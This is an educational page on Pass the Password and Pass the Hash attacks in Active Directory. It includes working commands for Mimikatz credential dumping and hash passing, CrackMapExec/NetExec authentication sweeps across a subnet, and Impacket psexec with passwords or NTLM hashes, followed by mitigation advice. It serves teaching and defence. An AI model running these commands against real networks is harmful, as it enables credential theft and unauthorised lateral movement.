Attacks - Active Directory Hacking

Pass the Password / Pass the Hash

Overview

Pass the Password (PtP) and Pass the Hash (PtH) are techniques used by attackers to move laterally within a network by leveraging stolen credentials or password hashes. These attacks take advantage of how Windows authentication protocols work, particularly NTLM authentication.

Pass the Password (PtP)

What is Pass the Password?

Pass the Password is a technique where an attacker uses a stolen plaintext password to authenticate as the victim user across the network.

How it Works?

  1. Attacker obtains valid credentials (username/password)
  2. Uses these credentials to authenticate to other systems
  3. Gains access to resources the compromised user has access to

Tools for PtP

  • NetExec
  • Impacket tools (psexec.py, wmiexec.py)
  • RDP clients
  • PowerShell remoting

Example Attack

Using CrackMapExec

crackmapexec smb 192.168.1.0/24 -u username -p password

Using Impacket’s psexec

psexec.py domain/username:password@target

Pass the Hash (PtH)

What is Pass the Hash?

Pass the Hash is an attack that allows an attacker to authenticate to a remote system using the underlying NTLM hash of a user’s password without knowing the actual password.

How it Works?

  1. Attacker obtains password hashes (usually NTLM hashes)
  2. Instead of cracking the hash, directly uses it for authentication
  3. Exploits NTLM authentication protocol’s design
  4. Allows lateral movement without password knowledge

Common Ways to Obtain Hashes

  1. Dumping LSASS memory
  2. Extracting from SAM database
  3. DCSync attack
  4. Mimikatz
  5. Registry hives

Tools for PtH

  • Mimikatz
  • Impacket suite
  • NetExec
  • Evil-WinRM
  • Metasploit

Example Attack

Using Mimikatz

sekurlsa::logonpasswords
sekurlsa::pth /user:administrator /domain:target.local /ntlm:hash

Using NetExec

nxc smb 192.168.1.0/24 -u username -H HASH

this will connect on every host that has smb enabled and try to authenticate using the hash provided.

using psexec.py

psexec.py domain/username@target -hashes :hash

Mitigation

Key Strategies

  1. Credential Protection

    • Limit account re-use
    • Use strong passwords
    • Disable guest and administrator accounts

  2. Network Security

    • Network segmentation
    • Enable SMB signing
    • Implement MFA

  3. System Hardening

    • Restrict admin accounts
    • Regular updates
    • Enable Credential Guard

Monitoring

  • Monitor privileged accounts
  • Implement logging
  • Deploy EDR solutions

Best Practices

  • Regular security training
  • Incident response planning
  • Access control reviews
  • Use Microsoft Defender for Identity

Conclusion

Pass the Password and Pass the Hash attacks remain significant threats in Active Directory environments. Understanding these attacks, implementing proper detection mechanisms, and maintaining strong security practices are crucial for protecting against these attack vectors. Regular security assessments and staying updated with the latest security measures help organizations maintain a robust security posture against such threats.